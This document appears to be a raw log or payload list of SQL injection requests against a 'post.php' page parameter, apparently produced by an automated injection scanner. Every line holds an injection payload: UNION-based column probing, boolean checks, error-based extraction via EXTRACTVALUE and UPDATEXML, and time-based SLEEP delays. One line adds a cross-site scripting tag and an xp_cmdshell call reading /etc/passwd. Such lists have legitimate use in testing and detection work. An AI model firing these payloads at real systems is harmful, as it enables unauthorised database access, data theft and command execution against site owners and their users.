/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PizL
/test/website/post.php?page=1"))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(5882=5882,1))),0x7178787a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("OEBc"="OEBc
/test/website/post.php?page=1") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WjTy
/test/website/post.php?page=EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%281258%3D1258%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29
/test/website/post.php?page=-4778` WHERE 4017=4017 UNION ALL SELECT 4017,4017,4017,4017,4017,4017,4017,4017,4017,4017,4017,4017-- fBIv
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UeMV
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cRAk
/test/website/post.php?page=1%25%27%20AND%20%281712%3D3995%29%2A3995%20AND%20%27%25%27%3D%27
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20UxoF
/test/website/post.php?page=1'+(SELECT AbbB WHERE 3856=3856 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))SLqO)#
/test/website/post.php?page=1%' AND 6235=6235 AND '%'='
/test/website/post.php?page=1%' AND 7328=6341-- YYCL
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZIiB
/test/website/post.php?page=1' WHERE 9785=9785;SELECT (CASE WHEN (7474=7474) THEN 7474 ELSE 7474*(SELECT 7474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=1)) UNION ALL SELECT NULL,NULL,NULL,NULL-- QcbK
/test/website/post.php?page=-9563")) AS nggC WHERE 6896=6896 UNION ALL SELECT 6896,6896,6896,6896,6896,6896,6896,6896,6896,6896,6896,6896,6896-- jCxR
/test/website/post.php?page=-2674%'))) UNION ALL SELECT 7484-- pLpn
/test/website/post.php?page=1%27%29%29%20AS%20YpFc%20WHERE%201853%3D1853%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VKWU%29%23
/test/website/post.php?page=1'))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rzKg
/test/website/post.php?page=-7539%"))) UNION ALL SELECT 5760,5760,5760,5760,5760,5760,5760,5760,5760,5760,5760,5760,5760-- YsZJ
/test/website/post.php?page=1 UNION ALL SELECT NULL#
/test/website/post.php?page=1%22%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ppSD%29%23
/test/website/post.php?page=-9284%22%29%20UNION%20ALL%20SELECT%201574--%20ClIA
/test/website/post.php?page=1') AS riOJ WHERE 5791=5791 AND 5432=5583#
/test/website/post.php?page=-9413%'))) UNION ALL SELECT 9329,9329,9329,9329,9329,9329,9329,9329,9329-- NGIV
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Kzzf
/test/website/post.php?page=1") AS pWuZ WHERE 8331=8331 RLIKE SLEEP(5)-- fkiA
/test/website/post.php?page=1%' AND 8820=8820#
/test/website/post.php?page=1') WHERE 4679=4679 AND 7933=8054-- iLVe
/test/website/post.php?page=1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20aGgj
/test/website/post.php?page=1%27%29%20AND%201635%3D1311%20AND%20%28%27FWzg%27%20LIKE%20%27FWzg
/test/website/post.php?page=-3453%" UNION ALL SELECT 4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137-- JQPP
/test/website/post.php?page=MAKE_SET%283276%3D3276%2CSLEEP%285%29%29
/test/website/post.php?page=1%22%29%29%20AS%20vWrd%20WHERE%203001%3D3001%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20pxsl
/test/website/post.php?page=1%22%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%22kJZK%22%3D%22kJZK
/test/website/post.php?page=1%27%29%29%29%3BSELECT%20%28CASE%20WHEN%20%281034%3D1034%29%20THEN%201034%20ELSE%201034%2A%28SELECT%201034%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- NiyZ
/test/website/post.php?page=1%" AND 1101=1101#
/test/website/post.php?page=1%29%29%29%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%289146%3D9146
/test/website/post.php?page=1%29%20AND%203579%3D9209%23
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20oViI
/test/website/post.php?page=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iypx
/test/website/post.php?page=1%29%20AND%20MAKE_SET%287623%3D1511%2C1511%29--%20vGPa
/test/website/post.php?page=1%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20kOqi
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20GeCx
/test/website/post.php?page=1")) AND ELT(8355=8355,SLEEP(5))#
/test/website/post.php?page=1%25%22%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%22%25%22%3D%22
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OISu
/test/website/post.php?page=1%27%20AND%202989%3D7094%20AND%20%27DcYw%27%3D%27DcYw
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%27%29%20AS%20JShR%20WHERE%205413%3D5413%20RLIKE%20SLEEP%285%29--%20fWVA
/test/website/post.php?page=1&BFbQ=7882 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
/test/website/post.php?page=1%')) UNION ALL SELECT NULL,NULL,NULL,NULL-- EPeC
/test/website/post.php?page=1%27%20WHERE%201722%3D1722%20AND%208363%3D3609--%20asRc
/test/website/post.php?page=-2773' UNION ALL SELECT 6674-- eeES
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20fZoI
/test/website/post.php?page=-5808%" UNION ALL SELECT 9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173-- wQOb
/test/website/post.php?page=1%")) AND 7697=7697 AND (("%"="
/test/website/post.php?page=-6603%22%29%29%29%20UNION%20ALL%20SELECT%203390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390--%20hQHk
/test/website/post.php?page=1%27%29%29%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%28%28%28%27yNCD%27%20LIKE%20%27yNCD
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20eRzo
/test/website/post.php?page=1") AS okZb WHERE 1573=1573;(SELECT * FROM (SELECT(SLEEP(5)))GZlk)-- dXoP
/test/website/post.php?page=-4713')) UNION ALL SELECT 6293,6293,6293,6293,6293-- lYdY
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20sJtS
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- flCX
/test/website/post.php?page=1%22%29%29%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%28%28%28%22imVx%22%20LIKE%20%22imVx
/test/website/post.php?page=1')) AND 9467=9467-- sEmD
/test/website/post.php?page=1%29%20WHERE%203811%3D3811%20AND%207697%3D7697--%20bFyZ
/test/website/post.php?page=1%25%27%20AND%203952%3D3952%20AND%20%27%25%27%3D%27
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%23
/test/website/post.php?page=-4716`) WHERE 7753=7753 UNION ALL SELECT 7753,7753,7753,7753,7753,7753,7753,7753,7753,7753,7753,7753,7753,7753,7753-- OgVa
/test/website/post.php?page=-2174%27%20UNION%20ALL%20SELECT%209214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214%2C9214--%20EERE
/test/website/post.php?page=1%29%29%20AS%20YWIx%20WHERE%201085%3D1085%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29--%20edIv
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20cWac
/test/website/post.php?page=-2809' IN BOOLEAN MODE) UNION ALL SELECT 3512-- GtEU
/test/website/post.php?page=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oLUH
/test/website/post.php?page=1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(5882=5882,1))),0x7178787a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('sAZw'='sAZw
/test/website/post.php?page=-9798" UNION ALL SELECT 4227-- vIIm
/test/website/post.php?page=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PrSv
/test/website/post.php?page=1" UNION ALL SELECT NULL-- oRYB
/test/website/post.php?page=-6503%22%29%29%29%20UNION%20ALL%20SELECT%205223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223%2C5223--%20LoFm
/test/website/post.php?page=1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27CVOa%27%3D%27CVOa
/test/website/post.php?page=1%") AND 7050=4421-- XdGB
/test/website/post.php?page=1' WHERE 7129=7129 AND 8182=2129-- gqjn
/test/website/post.php?page=-5819%29%20UNION%20ALL%20SELECT%202388%2C2388%2C2388%2C2388%2C2388--%20KeTS
/test/website/post.php?page=-7058%60%29%20WHERE%202395%3D2395%20UNION%20ALL%20SELECT%202395%2C2395--%20rfek
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL--%20HxcG
/test/website/post.php?page=-1458 UNION ALL SELECT 3779,3779-- CTdU
/test/website/post.php?page=-2823")) AS DXZc WHERE 2670=2670 UNION ALL SELECT 2670,2670,2670,2670,2670-- IOZz
/test/website/post.php?page=1%20AND%202936%3D%28SELECT%202936%20FROM%20PG_SLEEP%285%29%29
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20EeDD
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20aXGf
/test/website/post.php?page=1%25%27%29%20AND%20ELT%283734%3D3734%2C7834%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=1%')) AND SLEEP(5) AND (('%'='
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20xFnu
/test/website/post.php?page=1%27%29%29%29%20AND%207870%3D7870%20AND%20%28%28%28%27VcXN%27%20LIKE%20%27VcXN
/test/website/post.php?page=1') AS xlPq WHERE 5980=5980 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KDDW
/test/website/post.php?page=1"))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cblt
/test/website/post.php?page=1"))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HbEA
/test/website/post.php?page=1') ORDER BY 5682-- KQtP
/test/website/post.php?page=1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20qplj
/test/website/post.php?page=-3098) UNION ALL SELECT 9015,9015,9015,9015,9015,9015,9015,9015,9015,9015,9015,9015-- gDDS
/test/website/post.php?page=1%27%2B%28SELECT%20suLO%20WHERE%208855%3D8855%3BSELECT%20%28CASE%20WHEN%20%286976%3D1592%29%20THEN%206976%20ELSE%206976%2A%28SELECT%206976%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71767a6a71,(SELECT (ELT(8004=8004,1))),0x7178787a71)) USING utf8))) AND "Rztc" LIKE "Rztc
/test/website/post.php?page=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UDGt
/test/website/post.php?page=-8952') UNION ALL SELECT 4158,4158,4158,4158,4158,4158,4158,4158,4158-- SkoY
/test/website/post.php?page=1) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(4317=4317,1))),0x7178787a71,0x78))x))-- Vxpz
/test/website/post.php?page=1%27%29%20WHERE%208365%3D8365%20AND%20SLEEP%285%29%23
/test/website/post.php?page=1%60%20WHERE%203724%3D3724%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29SLqO%29%23
/test/website/post.php?page=-3828%22%29%20UNION%20ALL%20SELECT%203269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269--%20YGVZ
/test/website/post.php?page=1%')) AND 1770=1555 AND (('%'='
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20qQLg
/test/website/post.php?page=1%29%20AS%20YYgF%20WHERE%201625%3D1625%20RLIKE%20SLEEP%285%29--%20lDlD
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23
/test/website/post.php?page=-5301%29%20AS%20hdSJ%20WHERE%203009%3D3009%20UNION%20ALL%20SELECT%203009%2C3009%2C3009%2C3009--%20dGBq
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZbIV
/test/website/post.php?page=1') AND 2103=3189 AND ('LzAh' LIKE 'LzAh
/test/website/post.php?page=-2666%22%29%29%20AS%20SerM%20WHERE%209429%3D9429%20UNION%20ALL%20SELECT%209429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429%2C9429--%20jXBr
/test/website/post.php?page=1) AND (SELECT * FROM (SELECT(SLEEP(5)))VKWU)#
/test/website/post.php?page=1') AS kIyb WHERE 5200=5200 AND ELT(8416=8416,SLEEP(5))-- vysr
/test/website/post.php?page=-8764%27%29%29%20UNION%20ALL%20SELECT%201718%2C1718--%20hbON
/test/website/post.php?page=1%29%29%20AS%20hWJe%20WHERE%202600%3D2600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20DkXt
/test/website/post.php?page=1") AS MTMA WHERE 2664=2664 UNION ALL SELECT NULL,NULL,NULL-- XRZQ
/test/website/post.php?page=(SELECT CONCAT(0x7178787671,(SELECT (ELT(9870=9870,1))),0x716a767071))
/test/website/post.php?page=1%25%22%29%29%20AND%20%281687%3D9919%29%2A9919%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1%25%27%29%29%29%3BSELECT%20%28CASE%20WHEN%20%284644%3D2613%29%20THEN%204644%20ELSE%204644%2A%28SELECT%204644%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%22%29%29%29%20AND%202375%3D4916%20AND%20%28%28%28%22AYqv%22%20LIKE%20%22AYqv
/test/website/post.php?page=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jVdq
/test/website/post.php?page=1%29%29%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29%20AND%20%28%284231%3D4231
/test/website/post.php?page=1')) UNION ALL SELECT NULL,NULL,NULL-- KchV
/test/website/post.php?page=1%")) AND UPDATEXML(9183,CONCAT(0x2e,0x71767a6a71,(SELECT (ELT(9183=9183,1))),0x7178787a71),4408) AND (("%"="
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RUob
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ELAB
/test/website/post.php?page=1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20UMKp
/test/website/post.php?page=-7745%27%29%29%20UNION%20ALL%20SELECT%201827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827%2C1827--%20rxcX
/test/website/post.php?page=1" AND 6178=5301-- ghOP
/test/website/post.php?page=1%27%29%20AND%20ELT%283244%3D7824%2C7824%29--%20lPVg
/test/website/post.php?page=1')));SELECT SLEEP(5)#
/test/website/post.php?page=1` WHERE 1861=1861 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(4317=4317,1))),0x7178787a71,0x78))x))-- Ksjm
/test/website/post.php?page=1%27%20AND%20ELT%283734%3D3734%2C7834%29%20AND%20%27mUnC%27%3D%27mUnC
/test/website/post.php?page=1 AND 3952=3952
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
/test/website/post.php?page=1'+(SELECT JbQO WHERE 5105=5105 AND 7697=7697)+'
/test/website/post.php?page=-3530%25%27%29%20ORDER%20BY%201--%20dnXH
/test/website/post.php?page=1))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ZHmc
/test/website/post.php?page=-4467') AS mGMj WHERE 4352=4352 UNION ALL SELECT 4352,4352,4352-- FIxI
/test/website/post.php?page=1%27%29%29%29%20AND%20%281397%3D8129%29%2A8129%20AND%20%28%28%28%27iyNt%27%20LIKE%20%27iyNt
/test/website/post.php?page=-4519%22%29%20UNION%20ALL%20SELECT%209621%2C9621%2C9621%2C9621--%20XnAA
/test/website/post.php?page=1%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22Sgmg%22%3D%22Sgmg
/test/website/post.php?page=1%22%29%29%20AND%201302%3D1302--%20yJkA
/test/website/post.php?page=-2419%22%20UNION%20ALL%20SELECT%201063%2C1063%2C1063%2C1063%2C1063%2C1063%2C1063%2C1063%2C1063%2C1063%2C1063--%20THSE
/test/website/post.php?page=-6629` WHERE 5548=5548 UNION ALL SELECT 5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548,5548-- CapI
/test/website/post.php?page=-5999")) UNION ALL SELECT 6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652,6652-- GVUV
/test/website/post.php?page=1') AND ELT(9112=1211,1211) AND ('Hlaa'='Hlaa
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20MmFT
/test/website/post.php?page=1%20ORDER%20BY%201--%20HbRb
/test/website/post.php?page=1") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HbzD
/test/website/post.php?page=1%20ORDER%20BY%203772--%20kKXL
/test/website/post.php?page=1") AS JYNz WHERE 9009=9009 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))SLqO)#
/test/website/post.php?page=1%29%20AS%20XuwF%20WHERE%206296%3D6296%20AND%206280%3D6738--%20wqKv
/test/website/post.php?page=1")) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(5882=5882,1))),0x7178787a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("PCzh" LIKE "PCzh
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20DPQQ
/test/website/post.php?page=1'+(SELECT 'WBAG' WHERE 9715=9715;SELECT (CASE WHEN (7474=7474) THEN 7474 ELSE 7474*(SELECT 7474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=1%27%29%20AS%20YjKq%20WHERE%201220%3D1220%20AND%20MAKE_SET%282898%3D2898%2C8166%29--%20ZwIf
/test/website/post.php?page=1')) AS KnSd WHERE 4058=4058 AND ELT(8416=8416,SLEEP(5))-- ChMP
/test/website/post.php?page=1 WHERE 8259=8259;(SELECT * FROM (SELECT(SLEEP(5)))GZlk)-- viif
/test/website/post.php?page=-9053 UNION ALL SELECT 7711,7711-- SZKX
/test/website/post.php?page=1 AND 3531=4312-- oBLn
/test/website/post.php?page=-8811%27%29%20UNION%20ALL%20SELECT%202613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613--%20WfJG
/test/website/post.php?page=-5348%' UNION ALL SELECT 1985,1985,1985,1985,1985,1985,1985,1985,1985,1985-- HhfB
/test/website/post.php?page=1')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YPFq
/test/website/post.php?page=1%25%22%29%29%20RLIKE%20SLEEP%285%29%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20mBWU
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Niit
/test/website/post.php?page=1 WHERE 6178=6178 AND UPDATEXML(9183,CONCAT(0x2e,0x71767a6a71,(SELECT (ELT(9183=9183,1))),0x7178787a71),4408)-- hlCY
/test/website/post.php?page=-7974%20ORDER%20BY%201--%20eLMX
/test/website/post.php?page=1 ORDER BY 2148-- GAOc
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EZQZ
/test/website/post.php?page=1%22%3BSELECT%20%28CASE%20WHEN%20%289526%3D9510%29%20THEN%209526%20ELSE%209526%2A%28SELECT%209526%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1') RLIKE (SELECT (CASE WHEN (9118=9534) THEN 1 ELSE 0x28 END)) AND ('KrcX'='KrcX
/test/website/post.php?page=1%20AND%201332%3D9842--%20PSXX
/test/website/post.php?page=-6261%25%27%29%20UNION%20ALL%20SELECT%209828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828--%20Meul
/test/website/post.php?page=-2618"))) UNION ALL SELECT 4767,4767,4767,4767,4767,4767,4767,4767-- GpQc
/test/website/post.php?page=-2957%27%29%29%20AS%20lQiT%20WHERE%202751%3D2751%20UNION%20ALL%20SELECT%202751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751%2C2751--%20mfpx
/test/website/post.php?page=1%60%29%20WHERE%206223%3D6223%20AND%201101%3D1101%23
/test/website/post.php?page=1');SELECT (CASE WHEN (1585=3650) THEN 1585 ELSE 1585*(SELECT 1585 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=1%27%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20lYvR
/test/website/post.php?page=1%20WHERE%203829%3D3829%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20ypyZ
/test/website/post.php?page=1")) AS StXV WHERE 6219=6219 ORDER BY 1-- ZKnC
